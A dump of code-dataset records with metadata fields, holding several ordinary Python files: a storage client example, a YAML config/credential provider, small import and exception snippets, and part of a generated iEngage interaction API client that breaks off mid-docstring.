hexsha
string
size
int64
ext
string
lang
string
max_stars_repo_path
string
max_stars_repo_name
string
max_stars_repo_head_hexsha
string
max_stars_repo_licenses
list
max_stars_count
int64
max_stars_repo_stars_event_min_datetime
string
max_stars_repo_stars_event_max_datetime
string
max_issues_repo_path
string
max_issues_repo_name
string
max_issues_repo_head_hexsha
string
max_issues_repo_licenses
list
max_issues_count
int64
max_issues_repo_issues_event_min_datetime
string
max_issues_repo_issues_event_max_datetime
string
max_forks_repo_path
string
max_forks_repo_name
string
max_forks_repo_head_hexsha
string
max_forks_repo_licenses
list
max_forks_count
int64
max_forks_repo_forks_event_min_datetime
string
max_forks_repo_forks_event_max_datetime
string
content
string
avg_line_length
float64
max_line_length
int64
alphanum_fraction
float64
qsc_code_num_words_quality_signal
int64
qsc_code_num_chars_quality_signal
float64
qsc_code_mean_word_length_quality_signal
float64
qsc_code_frac_words_unique_quality_signal
float64
qsc_code_frac_chars_top_2grams_quality_signal
float64
qsc_code_frac_chars_top_3grams_quality_signal
float64
qsc_code_frac_chars_top_4grams_quality_signal
float64
qsc_code_frac_chars_dupe_5grams_quality_signal
float64
qsc_code_frac_chars_dupe_6grams_quality_signal
float64
qsc_code_frac_chars_dupe_7grams_quality_signal
float64
qsc_code_frac_chars_dupe_8grams_quality_signal
float64
qsc_code_frac_chars_dupe_9grams_quality_signal
float64
qsc_code_frac_chars_dupe_10grams_quality_signal
float64
qsc_code_frac_chars_replacement_symbols_quality_signal
float64
qsc_code_frac_chars_digital_quality_signal
float64
qsc_code_frac_chars_whitespace_quality_signal
float64
qsc_code_size_file_byte_quality_signal
float64
qsc_code_num_lines_quality_signal
float64
qsc_code_num_chars_line_max_quality_signal
float64
qsc_code_num_chars_line_mean_quality_signal
float64
qsc_code_frac_chars_alphabet_quality_signal
float64
qsc_code_frac_chars_comments_quality_signal
float64
qsc_code_cate_xml_start_quality_signal
float64
qsc_code_frac_lines_dupe_lines_quality_signal
float64
qsc_code_cate_autogen_quality_signal
float64
qsc_code_frac_lines_long_string_quality_signal
float64
qsc_code_frac_chars_string_length_quality_signal
float64
qsc_code_frac_chars_long_word_length_quality_signal
float64
qsc_code_frac_lines_string_concat_quality_signal
float64
qsc_code_cate_encoded_data_quality_signal
float64
qsc_code_frac_chars_hex_words_quality_signal
float64
qsc_code_frac_lines_prompt_comments_quality_signal
float64
qsc_code_frac_lines_assert_quality_signal
float64
qsc_codepython_cate_ast_quality_signal
float64
qsc_codepython_frac_lines_func_ratio_quality_signal
float64
qsc_codepython_cate_var_zero_quality_signal
bool
qsc_codepython_frac_lines_pass_quality_signal
float64
qsc_codepython_frac_lines_import_quality_signal
float64
qsc_codepython_frac_lines_simplefunc_quality_signal
float64
qsc_codepython_score_lines_no_logic_quality_signal
float64
qsc_codepython_frac_lines_print_quality_signal
float64
qsc_code_num_words
int64
qsc_code_num_chars
int64
qsc_code_mean_word_length
int64
qsc_code_frac_words_unique
null
qsc_code_frac_chars_top_2grams
int64
qsc_code_frac_chars_top_3grams
int64
qsc_code_frac_chars_top_4grams
int64
qsc_code_frac_chars_dupe_5grams
int64
qsc_code_frac_chars_dupe_6grams
int64
qsc_code_frac_chars_dupe_7grams
int64
qsc_code_frac_chars_dupe_8grams
int64
qsc_code_frac_chars_dupe_9grams
int64
qsc_code_frac_chars_dupe_10grams
int64
qsc_code_frac_chars_replacement_symbols
int64
qsc_code_frac_chars_digital
int64
qsc_code_frac_chars_whitespace
int64
qsc_code_size_file_byte
int64
qsc_code_num_lines
int64
qsc_code_num_chars_line_max
int64
qsc_code_num_chars_line_mean
int64
qsc_code_frac_chars_alphabet
int64
qsc_code_frac_chars_comments
int64
qsc_code_cate_xml_start
int64
qsc_code_frac_lines_dupe_lines
int64
qsc_code_cate_autogen
int64
qsc_code_frac_lines_long_string
int64
qsc_code_frac_chars_string_length
int64
qsc_code_frac_chars_long_word_length
int64
qsc_code_frac_lines_string_concat
null
qsc_code_cate_encoded_data
int64
qsc_code_frac_chars_hex_words
int64
qsc_code_frac_lines_prompt_comments
int64
qsc_code_frac_lines_assert
int64
qsc_codepython_cate_ast
int64
qsc_codepython_frac_lines_func_ratio
int64
qsc_codepython_cate_var_zero
int64
qsc_codepython_frac_lines_pass
int64
qsc_codepython_frac_lines_import
int64
qsc_codepython_frac_lines_simplefunc
int64
qsc_codepython_score_lines_no_logic
int64
qsc_codepython_frac_lines_print
int64
effective
string
hits
int64
7180d60a81068e83c7cc3f9f972e58ae0d70afda
1,297
py
Python
docs/source/examples/FB2.0/get_object_store_access_policies_object_store_users.py
Flav-STOR-WL/py-pure-client
03b889c997d90380ac5d6380ca5d5432792d3e89
[ "BSD-2-Clause" ]
14
2018-12-07T18:30:27.000Z
2022-02-22T09:12:33.000Z
docs/source/examples/FB2.0/get_object_store_access_policies_object_store_users.py
Flav-STOR-WL/py-pure-client
03b889c997d90380ac5d6380ca5d5432792d3e89
[ "BSD-2-Clause" ]
28
2019-09-17T21:03:52.000Z
2022-03-29T22:07:35.000Z
docs/source/examples/FB2.0/get_object_store_access_policies_object_store_users.py
Flav-STOR-WL/py-pure-client
03b889c997d90380ac5d6380ca5d5432792d3e89
[ "BSD-2-Clause" ]
15
2020-06-11T15:50:08.000Z
2022-03-21T09:27:25.000Z
# list access policies for object store users res = client.get_object_store_access_policies_object_store_users() print(res) if type(res) == pypureclient.responses.ValidResponse: print(list(res.items)) # list access policies for specific user res = client.get_object_store_access_policies_object_store_users(member_names=["acc1/myobjuser"]) print(res) if type(res) == pypureclient.responses.ValidResponse: print(list(res.items)) # list access policies for specific user by id res = client.get_object_store_access_policies_object_store_users(member_ids=["10314f42-020d-7080-8013-000ddt400090"]) print(res) if type(res) == pypureclient.responses.ValidResponse: print(list(res.items)) # list only users with full access res = client.get_object_store_access_policies_object_store_users(policy_names=["pure:policy/full-access"]) print(res) if type(res) == pypureclient.responses.ValidResponse: print(list(res.items)) # list only users with a specific policy by id res = client.get_object_store_access_policies_object_store_users(policy_ids=["10314f42-020d-7080-8013-000ddt400012"]) print(res) if type(res) == pypureclient.responses.ValidResponse: print(list(res.items)) # Other valid fields: continuation_token, filter, limit, offset, sort # See section "Common Fields" for examples
46.321429
117
0.801079
185
1,297
5.4
0.275676
0.121121
0.096096
0.09009
0.783784
0.737738
0.737738
0.737738
0.737738
0.737738
0
0.046809
0.094063
1,297
27
118
48.037037
0.803404
0.242097
0
0.75
0
0
0.111795
0.097436
0
0
0
0
0
1
0
false
0
0
0
0
0.5
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
7
719c40812973132a2073277bb050f2cd9a991f71
4,623
py
Python
sitri/contrib/yaml.py
gitter-badger/sitri
fd2e7f2dfede0f3565b0dc9f9b8ae7a1bc94f7e2
[ "MIT" ]
null
null
null
sitri/contrib/yaml.py
gitter-badger/sitri
fd2e7f2dfede0f3565b0dc9f9b8ae7a1bc94f7e2
[ "MIT" ]
null
null
null
sitri/contrib/yaml.py
gitter-badger/sitri
fd2e7f2dfede0f3565b0dc9f9b8ae7a1bc94f7e2
[ "MIT" ]
null
null
null
import os import typing import yaml from ..config.providers import ConfigProvider from ..credentials.providers import CredentialProvider class YamlConfigProvider(ConfigProvider): """Config provider for YAML""" provider_code = "yaml" def __init__(self, yaml_path: str = "./data.yaml", default_separator: str = "."): """ :param yaml_path: path to yaml file :param default_separator: default value separator for path-mode """ self._yaml = yaml.safe_load(open(os.path.abspath(yaml_path))) self.separator = default_separator def _get_by_path(self, path: str, separator: str) -> typing.Any: """Retrieve value from a dictionary using a list of keys. :param path: string with separated keys """ dict_local = self._yaml.copy() keys = path.split(separator) for key in keys: try: dict_local = dict_local[int(key)] if key.isdigit() else dict_local[key] except Exception: if key not in dict_local: return None dict_local = dict_local[key] return dict_local def _get_by_key(self, key: str) -> typing.Any: """Retrieve value from a dictionary using a key. :param key: key from json """ if key in self._yaml: return self._yaml[key] else: return None def get(self, key: str, path_mode: bool = False, separator: str = None) -> typing.Optional[typing.Any]: """Get value from json :param key: key or path for search :param path_mode: boolean mode switcher :param separator: separator for path keys in path mode """ separator = separator if separator else self.separator if path_mode: return self._get_by_path(key, separator=separator) return self._get_by_key(key) def keys(self, path_mode: bool = False, separator: str = None) -> typing.List[str]: """Keys in json :param path_mode: [future] path mode for keys list :param separator: [future] separators for keys in path mode """ # TODO: implemented path-mode for keys list if not path_mode: return self._yaml.keys() else: raise NotImplementedError("Path-mode not implemented!") class YamlCredentialProvider(CredentialProvider): """Credential provider for YAML""" provider_code = "yaml" def __init__(self, yaml_path: str = "./data.yaml", default_separator: str = "."): """ :param yaml_path: path to yaml file :param default_separator: default value separator for path-mode """ self._yaml = yaml.safe_load(open(os.path.abspath(yaml_path))) self.separator = default_separator def _get_by_path(self, path: str, separator: str) -> typing.Any: """Retrieve value from a dictionary using a list of keys. :param path: string with separated keys """ dict_local = self._yaml.copy() keys = path.split(separator) for key in keys: try: dict_local = dict_local[int(key)] if key.isdigit() else dict_local[key] except Exception: if key not in dict_local: return None dict_local = dict_local[key] return dict_local def _get_by_key(self, key: str) -> typing.Any: """Retrieve value from a dictionary using a key. :param key: key from yaml """ if key in self._yaml: return self._yaml[key] else: return None def get(self, key: str, path_mode: bool = False, separator: str = None) -> typing.Optional[typing.Any]: """Get value from json :param key: key or path for search :param path_mode: boolean mode switcher :param separator: separator for path keys in path mode """ separator = separator if separator else self.separator if path_mode: return self._get_by_path(key, separator=separator) return self._get_by_key(key) def keys(self, path_mode: bool = False, separator: str = None) -> typing.List[str]: """Keys in json :param path_mode: [future] path mode for keys list :param separator: [future] separators for keys in path mode """ # TODO: implemented path-mode for keys list if not path_mode: return self._yaml.keys() else: raise NotImplementedError("Path-mode not implemented!")
29.634615
107
0.605884
576
4,623
4.713542
0.133681
0.070718
0.023573
0.029466
0.917864
0.917864
0.917864
0.917864
0.917864
0.917864
0
0
0.304564
4,623
155
108
29.825806
0.844479
0.265628
0
0.895522
0
0
0.027141
0
0
0
0
0.012903
0
1
0.149254
false
0
0.074627
0
0.492537
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
8
719ebad60df6378ab586809b08c677b3eb620efb
264
py
Python
Python/Fluent_Python/chapter5/section15/else_statument.py
sunyunxian/test_lib
5e98fff1074b301960d39165aa99d60db880b262
[ "Apache-2.0" ]
1
2021-12-17T14:57:30.000Z
2021-12-17T14:57:30.000Z
Python/Fluent_Python/chapter5/section15/else_statument.py
ok-frank/test_lib
5e98fff1074b301960d39165aa99d60db880b262
[ "Apache-2.0" ]
null
null
null
Python/Fluent_Python/chapter5/section15/else_statument.py
ok-frank/test_lib
5e98fff1074b301960d39165aa99d60db880b262
[ "Apache-2.0" ]
null
null
null
try: print('No exception') except: print('Has exception') else: print('No exception, then do this') try: raise KeyError print('No exception') except: print('Has exception') else: print('No exception, then do this, else not do this')
15.529412
57
0.643939
36
264
4.722222
0.361111
0.164706
0.376471
0.258824
0.811765
0.811765
0.811765
0.811765
0.811765
0.811765
0
0
0.231061
264
16
58
16.5
0.837438
0
0
0.769231
0
0
0.458015
0
0
0
0
0
0
1
0
true
0
0
0
0
0.461538
0
0
0
null
0
1
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
1
0
11
71a2256c4d0b640e9ab968c0661d77c55ce4ccd6
135
py
Python
tensorbuilder/patches/__init__.py
cgarciae/tensorbuilder
f8e0b19c09deaaea67611d9df51218e4a9cd705a
[ "MIT" ]
109
2016-06-05T21:51:53.000Z
2021-09-06T07:00:26.000Z
tensorbuilder/patches/__init__.py
cgarciae/tensorbuilder
f8e0b19c09deaaea67611d9df51218e4a9cd705a
[ "MIT" ]
6
2016-06-06T01:05:40.000Z
2016-09-19T19:30:49.000Z
tensorbuilder/patches/__init__.py
cgarciae/tensorbuilder
f8e0b19c09deaaea67611d9df51218e4a9cd705a
[ "MIT" ]
13
2016-06-06T14:15:31.000Z
2019-11-04T23:33:56.000Z
#import layers_patch import tensorflow_patch import summaries_patch import layers_patch import rnn_utilities_patch import custom_patch
19.285714
26
0.903704
19
135
6.052632
0.421053
0.478261
0.295652
0.4
0
0
0
0
0
0
0
0
0.088889
135
6
27
22.5
0.934959
0.140741
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
8
71d73d74c09b8d200063b44afa2b3b9151dfd65a
263,198
py
Python
iengage_client/apis/interaction_api.py
iEngage/python-sdk
76cc6ed697d7599ce9af74124c12d33ad5aff419
[ "Apache-2.0" ]
null
null
null
iengage_client/apis/interaction_api.py
iEngage/python-sdk
76cc6ed697d7599ce9af74124c12d33ad5aff419
[ "Apache-2.0" ]
null
null
null
iengage_client/apis/interaction_api.py
iEngage/python-sdk
76cc6ed697d7599ce9af74124c12d33ad5aff419
[ "Apache-2.0" ]
null
null
null
# coding: utf-8 """ iEngage 2.0 API This API enables Intelligent Engagement for your Business. iEngage is a platform that combines process, augmented intelligence and rewards to help you intelligently engage customers. OpenAPI spec version: 2.0 Generated by: https://github.com/swagger-api/swagger-codegen.git Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from __future__ import absolute_import import sys import os import re # python 2 and python 3 compatibility library from six import iteritems from ..configuration import Configuration from ..api_client import ApiClient class InteractionApi(object): """ NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. Ref: https://github.com/swagger-api/swagger-codegen """ def __init__(self, api_client=None): config = Configuration() if api_client: self.api_client = api_client else: if not config.api_client: config.api_client = ApiClient() self.api_client = config.api_client def add_interaction(self, requester_id, client_token, **kwargs): """ Share interaction without attachment This service allows a user to post an interaction. The following fields(key:value) are required to be present in the Interaction JSON object. Refer to the Model & Model Schema of the expected JSON Object for the body of this API. **Required fields** 1. interactionTitle This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.add_interaction(requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param InteractionInputModel body: :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.add_interaction_with_http_info(requester_id, client_token, **kwargs) else: (data) = self.add_interaction_with_http_info(requester_id, client_token, **kwargs) return data def add_interaction_with_http_info(self, requester_id, client_token, **kwargs): """ Share interaction without attachment This service allows a user to post an interaction. The following fields(key:value) are required to be present in the Interaction JSON object. Refer to the Model & Model Schema of the expected JSON Object for the body of this API. **Required fields** 1. interactionTitle This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.add_interaction_with_http_info(requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param InteractionInputModel body: :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. """ all_params = ['requester_id', 'client_token', 'body', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method add_interaction" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `add_interaction`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `add_interaction`") resource_path = '/interactions'.replace('{format}', 'json') path_params = {} query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} body_params = None if 'body' in params: body_params = params['body'] # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'application/x-www-form-urlencoded']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteraction', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def add_interaction_0(self, interaction_title, file, requester_id, client_token, **kwargs): """ Share interaction with attachment Allows the user to share interaction with attachment. Returns the interaction object This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.add_interaction_0(interaction_title, file, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str interaction_title: interactionTitle (required) :param file file: file (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str category_id: categoryId :param str interaction_type: interactionType :param str interaction_description: interactionDescription :param str association: association :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.add_interaction_0_with_http_info(interaction_title, file, requester_id, client_token, **kwargs) else: (data) = self.add_interaction_0_with_http_info(interaction_title, file, requester_id, client_token, **kwargs) return data def add_interaction_0_with_http_info(self, interaction_title, file, requester_id, client_token, **kwargs): """ Share interaction with attachment Allows the user to share interaction with attachment. Returns the interaction object This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.add_interaction_0_with_http_info(interaction_title, file, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str interaction_title: interactionTitle (required) :param file file: file (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str category_id: categoryId :param str interaction_type: interactionType :param str interaction_description: interactionDescription :param str association: association :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. """ all_params = ['interaction_title', 'file', 'requester_id', 'client_token', 'category_id', 'interaction_type', 'interaction_description', 'association', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method add_interaction_0" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_title' is set if ('interaction_title' not in params) or (params['interaction_title'] is None): raise ValueError("Missing the required parameter `interaction_title` when calling `add_interaction_0`") # verify the required parameter 'file' is set if ('file' not in params) or (params['file'] is None): raise ValueError("Missing the required parameter `file` when calling `add_interaction_0`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `add_interaction_0`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `add_interaction_0`") resource_path = '/interactions/attachment'.replace('{format}', 'json') path_params = {} query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'category_id' in params: form_params.append(('categoryId', params['category_id'])) if 'interaction_type' in params: form_params.append(('interactionType', params['interaction_type'])) if 'interaction_title' in params: form_params.append(('interactionTitle', params['interaction_title'])) if 'interaction_description' in params: form_params.append(('interactionDescription', params['interaction_description'])) if 'association' in params: form_params.append(('association', params['association'])) if 'file' in params: local_var_files['file'] = params['file'] body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['multipart/form-data']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteraction', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def add_response(self, interaction_id, requester_id, client_token, **kwargs): """ Response the specified interaction This service allows a user to post a response on an interaction. The following fields(key:value) are required to be present in the Response JSON object. Refer to the Model & Model Schema of the expected JSON Object for the body of this API. **Required fields** 1. interactionId (Path Parameter) 2. responseDescription This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.add_response(interaction_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param InteractionResponse body: :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionResponse If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.add_response_with_http_info(interaction_id, requester_id, client_token, **kwargs) else: (data) = self.add_response_with_http_info(interaction_id, requester_id, client_token, **kwargs) return data def add_response_with_http_info(self, interaction_id, requester_id, client_token, **kwargs): """ Response the specified interaction This service allows a user to post a response on an interaction. The following fields(key:value) are required to be present in the Response JSON object. Refer to the Model & Model Schema of the expected JSON Object for the body of this API. **Required fields** 1. interactionId (Path Parameter) 2. responseDescription This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.add_response_with_http_info(interaction_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param InteractionResponse body: :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionResponse If the method is called asynchronously, returns the request thread. """ all_params = ['interaction_id', 'requester_id', 'client_token', 'body', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method add_response" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_id' is set if ('interaction_id' not in params) or (params['interaction_id'] is None): raise ValueError("Missing the required parameter `interaction_id` when calling `add_response`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `add_response`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `add_response`") resource_path = '/interactions/{interactionId}/responses'.replace('{format}', 'json') path_params = {} if 'interaction_id' in params: path_params['interactionId'] = params['interaction_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} body_params = None if 'body' in params: body_params = params['body'] # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded', 'application/json']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionResponse', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def add_response_0(self, body, body2, logged_in_user_id, access_token, client_token, **kwargs): """ Response the specified interaction Allows the user to response the interaction This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.add_response_0(body, body2, logged_in_user_id, access_token, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int body: interactionId (required) :param str body2: response (required) :param str logged_in_user_id: User id of logged / authenticated user (required) :param str access_token: Unique session token for user. To get access token user will have to authenticate (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str body3: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */ :param list[Attachment] body4: :return: VerveResponseInteractionResponse If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.add_response_0_with_http_info(body, body2, logged_in_user_id, access_token, client_token, **kwargs) else: (data) = self.add_response_0_with_http_info(body, body2, logged_in_user_id, access_token, client_token, **kwargs) return data def add_response_0_with_http_info(self, body, body2, logged_in_user_id, access_token, client_token, **kwargs): """ Response the specified interaction Allows the user to response the interaction This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.add_response_0_with_http_info(body, body2, logged_in_user_id, access_token, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int body: interactionId (required) :param str body2: response (required) :param str logged_in_user_id: User id of logged / authenticated user (required) :param str access_token: Unique session token for user. To get access token user will have to authenticate (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str body3: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */ :param list[Attachment] body4: :return: VerveResponseInteractionResponse If the method is called asynchronously, returns the request thread. """ all_params = ['body', 'body2', 'logged_in_user_id', 'access_token', 'client_token', 'body3', 'body4'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method add_response_0" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'body' is set if ('body' not in params) or (params['body'] is None): raise ValueError("Missing the required parameter `body` when calling `add_response_0`") # verify the required parameter 'body2' is set if ('body2' not in params) or (params['body2'] is None): raise ValueError("Missing the required parameter `body2` when calling `add_response_0`") # verify the required parameter 'logged_in_user_id' is set if ('logged_in_user_id' not in params) or (params['logged_in_user_id'] is None): raise ValueError("Missing the required parameter `logged_in_user_id` when calling `add_response_0`") # verify the required parameter 'access_token' is set if ('access_token' not in params) or (params['access_token'] is None): raise ValueError("Missing the required parameter `access_token` when calling `add_response_0`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `add_response_0`") resource_path = '/interactions/{interactionId}/responses/attachment'.replace('{format}', 'json') path_params = {} query_params = {} header_params = {} if 'logged_in_user_id' in params: header_params['loggedInUserId'] = params['logged_in_user_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} body_params = None if 'body4' in params: body_params = params['body4'] # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['multipart/form-data']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionResponse', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def change_interaction_category(self, interaction_id, category_id, requester_id, client_token, **kwargs): """ Change interaction category Allows the user to change the interaction category. This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.change_interaction_category(interaction_id, category_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param int category_id: New interaction categoryId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 